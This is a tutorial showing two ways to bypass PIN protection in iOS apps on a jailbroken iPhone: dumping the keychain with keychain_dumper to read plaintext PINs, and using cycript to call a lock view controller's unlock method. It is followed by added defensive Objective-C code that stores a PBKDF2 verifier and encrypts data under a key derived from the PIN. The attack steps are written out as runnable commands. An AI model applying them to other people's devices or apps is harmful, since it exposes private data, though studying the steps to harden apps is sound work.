For these hacks the iPhone must be jailbroken, and there is currently a jailbreak available for iOS 8.4 and some versions below it. 4-digit PINs can be brute-forced unless there is an attempt limit. Even with the limit it can still be hacked, but you would need to break the phone open to rig the power to cut before the attempt is registered. Example here.
For all of these you need:
- Phone to be jailbroken
- OpenSSH installed on the phone
### 1) Dump the iOS Keychain
This is stupid easy. And it's terrifying how many apps store their PINs & passwords in plaintext.
Using KeyChain-Dumper, installed by cloning the repo and using scp to place the binary in the phone's root dir. Then just run it:

```
$ ./keychain_dumper
```

You can see the PIN in plaintext in the Keychain Data field:

```
Generic Password
----------------
Service: AppName
Account: secret
Entitlement Group: X9V42BVZ5X
Label: (null)
Generic Field: (null)
Keychain Data: 1234
```
### 2) Method Swizzling
This is also pretty easy. In many apps the only thing keeping you from the app's data is a view. For this one I enabled Touch ID even though it doesn't really matter, because you can still log in with the PIN. This requires cycript, which can be installed from Cydia straight onto the iPhone.
Once we ssh in we must find the process for the app:

```
$ ps aux | grep "appName"
```

You'll get something like this. The 2nd number, in this case 4293, is the process ID:

```
mobile 4293 0.0 2.8 623812 28572 ?? Ss 6:17PM 0:00.81 /var/mobile/Containers/Bundle/Application/59575112-731A-4A93-B0D3-431599D30C8A/AppName.app/AppName
```

Now you want to use cycript to jack into that process:

```
$ cycript -p 4293
cy#
```

Now you need to find the currently visible view controller with cycript:

```
cy# UIApp.keyWindow.rootViewController.visibleViewController
#"<LockViewController: 0x145534940>"
```
Now that we've found that LockViewController is what we're currently seeing, we can take a look at its methods to see if anything looks interesting. Cycript accepts JavaScript, so we can write a function into the cycript interpreter that asks the Objective-C runtime for the class's method list:

```javascript
// Returns an array of {selector, implementation} pairs for every instance
// method the Objective-C runtime knows about on the named class.
function printMethods(className) {
    var count = new new Type("I");   // allocate an unsigned int to receive the method count
    var methods = class_copyMethodList(objc_getClass(className), count);
    var methodsArray = [];
    for (var i = 0; i < *count; i++) {
        var method = methods[i];
        methodsArray.push({selector: method_getName(method), implementation: method_getImplementation(method)});
    }
    free(methods);                   // class_copyMethodList hands back a malloc'd array
    free(count);
    return methodsArray;
}
```

```
cy# printMethods("LockViewController") // this prints a ton of methods
[{selector:@selector(unlock),implementation:0x1000fa774},{selector:@selector(disableTouchID),implementation:0x1000fc3fc},
{selector:@selector(hasRemainingPasswordAttempts),implementation:0x1000fb0b4},...]
```
There are usually quite a few methods that print out, but I showed some interesting ones, especially unlock.
To call that method we simply use this command:

```
cy# [UIApp.keyWindow.rootViewController.visibleViewController unlock]
```

Then poof, the lock is gone and you're in the app with all of its "secure" data.
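Both sections come down to the same two design defects: the PIN sits in the keychain as a readable value, and the lock is a view whose unlock method can be invoked from the runtime rather than a check the data actually depends on. The following is an added defensive example, not code from the original post or from any app it describes, showing how an app can avoid both: it stores a random salt plus a PBKDF2 verifier instead of the PIN, marks the keychain item WhenUnlockedThisDeviceOnly, and encrypts its records under a second key derived from the PIN, so that a dumped keychain shows 48 random-looking bytes and an unlocked view without the PIN has only ciphertext to display. The service and account names, the iteration count and the 48-byte record layout are assumptions made for this example.

```objectivec
// Added defensive example, not code from the original post. Instead of writing
// the PIN itself into the keychain, the app stores a random salt plus a PBKDF2
// verifier, marks the item WhenUnlockedThisDeviceOnly, and uses a second key
// derived from the PIN to encrypt its data. Service/account names, the
// iteration count and the 48-byte record layout are assumptions for this example.
#import <Foundation/Foundation.h>
#import <Security/Security.h>
#import <CommonCrypto/CommonCrypto.h>

static NSString *const kPinService = @"com.example.app";   // assumed name
static NSString *const kPinAccount = @"pin-verifier";      // assumed name
static const unsigned kPbkdfRounds = 100000;               // assumed; tune per device
static const NSUInteger kSaltLen = 16, kVerifierLen = 32, kDataKeyLen = 32;

// PBKDF2-HMAC-SHA256 over the PIN, 64 bytes out: the first 32 are stored as the
// verifier, the last 32 become the data-encryption key and are never stored.
// PBKDF2 computes each 32-byte block independently, so the stored verifier
// gives no shortcut to the key.
static NSData *DeriveFromPin(NSString *pin, NSData *salt) {
    NSData *p = [pin dataUsingEncoding:NSUTF8StringEncoding];
    NSMutableData *out = [NSMutableData dataWithLength:kVerifierLen + kDataKeyLen];
    int rc = CCKeyDerivationPBKDF(kCCPBKDF2, p.bytes, p.length, salt.bytes, salt.length,
                                  kCCPRFHmacAlgSHA256, kPbkdfRounds,
                                  out.mutableBytes, out.length);
    return rc == kCCSuccess ? out : nil;
}

static NSDictionary *BaseQuery(void) {
    return @{ (__bridge id)kSecClass:       (__bridge id)kSecClassGenericPassword,
              (__bridge id)kSecAttrService: kPinService,
              (__bridge id)kSecAttrAccount: kPinAccount };
}

// Store salt||verifier. The accessibility class keeps the item out of
// unencrypted backups and unavailable until the device passcode is entered.
static BOOL StoreRecord(NSData *record) {
    SecItemDelete((__bridge CFDictionaryRef)BaseQuery());
    NSMutableDictionary *add = [BaseQuery() mutableCopy];
    add[(__bridge id)kSecValueData] = record;
    add[(__bridge id)kSecAttrAccessible] =
        (__bridge id)kSecAttrAccessibleWhenUnlockedThisDeviceOnly;
    return SecItemAdd((__bridge CFDictionaryRef)add, NULL) == errSecSuccess;
}

static NSData *LoadRecord(void) {
    NSMutableDictionary *q = [BaseQuery() mutableCopy];
    q[(__bridge id)kSecReturnData] = @YES;
    q[(__bridge id)kSecMatchLimit] = (__bridge id)kSecMatchLimitOne;
    CFTypeRef result = NULL;
    if (SecItemCopyMatching((__bridge CFDictionaryRef)q, &result) != errSecSuccess) return nil;
    return (__bridge_transfer NSData *)result;
}

// Enrolment: a keychain dump of this item shows 48 random-looking bytes, not "1234".
BOOL EnrollPin(NSString *pin) {
    NSMutableData *salt = [NSMutableData dataWithLength:kSaltLen];
    if (SecRandomCopyBytes(kSecRandomDefault, salt.length, salt.mutableBytes) != 0) return NO;
    NSData *derived = DeriveFromPin(pin, salt);
    if (!derived) return NO;
    NSMutableData *record = [salt mutableCopy];
    [record appendData:[derived subdataWithRange:NSMakeRange(0, kVerifierLen)]];
    return StoreRecord(record);
}

// Returns the data key or nil. There is no boolean "isUnlocked" state for a
// runtime call to flip: a wrong PIN yields no key, and without the key the
// app's encrypted records cannot be decrypted.
NSData *DataKeyForPin(NSString *pin) {
    NSData *record = LoadRecord();
    if (record.length != kSaltLen + kVerifierLen) return nil;
    NSData *salt = [record subdataWithRange:NSMakeRange(0, kSaltLen)];
    NSData *derived = DeriveFromPin(pin, salt);
    if (!derived) return nil;
    const uint8_t *want = (const uint8_t *)record.bytes + kSaltLen;
    const uint8_t *got  = derived.bytes;
    uint8_t diff = 0;                       // constant-time comparison
    for (NSUInteger i = 0; i < kVerifierLen; i++) diff |= want[i] ^ got[i];
    if (diff != 0) return nil;
    return [derived subdataWithRange:NSMakeRange(kVerifierLen, kDataKeyLen)];
}

// AES-256-CBC with a fresh IV prepended; the app persists only this blob.
NSData *SealWithKey(NSData *key, NSData *plaintext) {
    NSMutableData *iv = [NSMutableData dataWithLength:kCCBlockSizeAES128];
    if (SecRandomCopyBytes(kSecRandomDefault, iv.length, iv.mutableBytes) != 0) return nil;
    NSMutableData *out = [NSMutableData dataWithLength:plaintext.length + kCCBlockSizeAES128];
    size_t moved = 0;
    CCCryptorStatus st = CCCrypt(kCCEncrypt, kCCAlgorithmAES, kCCOptionPKCS7Padding,
                                 key.bytes, kCCKeySizeAES256, iv.bytes,
                                 plaintext.bytes, plaintext.length,
                                 out.mutableBytes, out.length, &moved);
    if (st != kCCSuccess) return nil;
    out.length = moved;
    [iv appendData:out];
    return iv;
}
```

EnrollPin runs once when the user picks a PIN; DataKeyForPin is what the lock screen calls, and the key it returns is what SealWithKey (and the matching decrypt) uses for the app's records. With this layout a keychain_dumper run shows salt and verifier bytes rather than the PIN, and invoking unlock on the view controller from the runtime changes what is on screen but leaves the records as ciphertext, since no key was ever produced. CBC here is unauthenticated; add an HMAC over the IV and ciphertext before relying on it for integrity.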